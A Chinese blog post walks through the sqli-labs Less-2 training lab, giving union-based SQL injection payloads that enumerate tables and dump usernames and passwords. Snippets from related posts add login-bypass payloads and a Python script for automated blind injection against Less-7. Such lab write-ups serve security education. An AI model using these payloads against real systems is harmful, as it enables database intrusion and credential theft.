sqli-less-2

已于 2024-11-15 21:21:08 修改
阅读量235 收藏 1
点赞数 3
分类专栏: sqli 文章标签: 数据库
于 2024-11-15 21:20:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74138139/article/details/143807110
版权

1.寻找注入点(和数据库有交互  ?aa=bbb )

?id=1


2.判断闭合方式

        先判断数字型、字符型
                在后面输入  ?id=1asdf  (报错数字型,不报错字符型)
        在判断闭合方式
                看输入内容后面符号(无符号)

             

3.判断列数

?id=1 order by 3 --+

(与第一关相同,去掉单引号)

4.联合查询

?id=-1 union select 1,2,3 --+

5.获取数据库名

?id=-1 union select 1,database(),3 --+

(还是与第一关相同,去掉单引号)

6.获取表名

?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 --+

7.获取列名

?id=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 --+

8.获取具体数据

?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+

concat_ws 将username和password用波浪号(~)进行隔开,(使用十六进制的波浪号0x7e)

group_concat将所有数据聚合在一行进行显示

SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 362
SQLI-LABS
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1823
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs之Less-2
→_→
03-12 1408
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
sqli less-02
ANYOUZHEN的博客
04-30 430
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1507
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
sqli-lab教程Less-2
Brucye
03-23 347
less-1 sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select column_name
sqli靶场通关之less2
sunxueer的博客
07-15 519
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字型SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 爆数据库名 id=1 and 1=2 union select 1,
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2282
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs Less18-Less23 HTTP头
beiweixiaotian66的博客
07-25 794
一丢丢Sqli-labs小练习
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 853
一丢丢Sqli-labs小练习
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1030
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场 Less-2(详细版)
m0_57671135的博客
06-19 257
id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()接下来联合查询,首先需要判断列数?
sqli-Less1
qq_44060093的博客
04-19 563
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
sqli-labs/Less-2/布尔型注入
m0_75178803的博客
04-17 119
得到数据库用户,数据库版本,操作系统,和数据库名字。第二个页面报错,说明是数字型注入。4.查询指定数据库下的表名。5.查询指定表名下的列名。说明有3个列名字段数。
sqli-labs-less-2完整教程
yzcn
10-22 2198
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
sqli-less 笔记
WYJ____的博客
08-03 456
一 ' ?id=1' ?id=1' and 1=1%23 ?id=1' and 1=2%23 二 数值 ?id=1' ?id=1 and 1=1%23 ?id=1 and 1=2%23 三 ') ?id=1' ?id=1') and 1=1%23 ?id=1') and 1=2%23 四 ") ?id=1") ?id=1") and 1=1%23 ?id=1") and 1...
SQLi-LABS Less-2,联合注入+报错注入_如何判断less-2的注入点
2401_83974660的博客
04-18 473
页面显示数据库的报错信息,符合报错注入的条件。按照第4个字段排序开始报错,确定字段数为:3。页面正常报错,确定报错函数可以使用。
SqliLess-1和less-2操作步骤 ,求出username和password下的字段内容
m0_52341820的博客
04-13 464
Less-1: 进入Less-1页面: 检查页面是否存在sql注入,输入敏感字符%27,出现报错,说明存在注入漏洞。 判断查询表的列数:使用order by语句和二分法探测出列数为三 之后判断显示位:使用union select联合查询语句判断显示位,若希望显示出后面的,需要将union语句的前半部分显示为假 之后求当前数据库的名字,得出数据库名等于secuirty 之后查询数据的下的表名:http://127.0.0.1/sqli/Less-1/?id=-1' %20%20 un.
sqli-labs Less-13
qq_42630215的博客
03-27 200
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1 uname= ') union select count(*),c...
sqli-labs- less7
最新发布
12-28
### SQLi-7 教程与解决方案 #### 背景介绍 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操纵数据库查询。SQLi-Labs 是一个用于练习和学习SQL注入技术的平台。 #### Less-7 特点分析 Less-7 主要关注基于布尔盲注(Boolean-based Blind Injection)的技术[^1]。这种类型的注入不依赖于错误消息返回具体的信息,而是利用条件判断来推断数据的存在与否。 #### 实验环境搭建 为了进行实验,确保已经安装并配置好了PHP服务器以及MySQL数据库,并且成功部署了SQLi-Labs项目文件夹下的`/sqli/Less-7/`目录中的脚本[^2]。 #### 测试用例准备 访问目标URL `http://localhost/sqli-labs/Less-7/?id=` 并尝试不同的参数值来进行测试。对于布尔盲注来说,通常会构造一些能够引起不同页面响应的行为模式作为基础: - 正常情况:当ID存在时显示正常的内容; - 错误情况:如果不存在对应的记录,则可能给出空白页或其他提示信息; #### 注入点发现 在Less-7中,`id` 参数是一个潜在的注入点。可以先验证是否存在SQL注入漏洞,比如发送请求 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='1` 和 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='2` 来观察是否有区别性的反应。 #### 数据库版本探测实例 一旦确认了注入的可能性之后,就可以进一步探索更多细节。例如获取当前使用的 MySQL 版本号可以通过如下方法实现: ```sql http://localhost/sqli-labs/Less-7/?id=-1 UNION SELECT @@version -- ``` 此命令将会把 `-1` 替换成实际存在的 ID 值加上联合选择操作符 (`UNION`) ,从而执行第二个查询并将结果集附加到原始查询的结果集中展示出来。 #### 字符串长度枚举技巧 假设想要知道管理员用户名的具体字符数,那么可以根据ASCII码表逐位猜测直到找到匹配为止。下面是一段Python代码片段用来自动化这个过程: ```python import requests url = "http://localhost/sqli-labs/Less-7/" payload_true = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))={}--" payload_false = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))!={}--" for i in range(1, 20): for j in range(32, 128): r = requests.get(url + payload_true.format(i,j)) if "You are in" in r.text: print(chr(j), end='') break print() ``` 这段程序将依次遍历每一个位置上的字母直至整个字符串被还原完毕。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值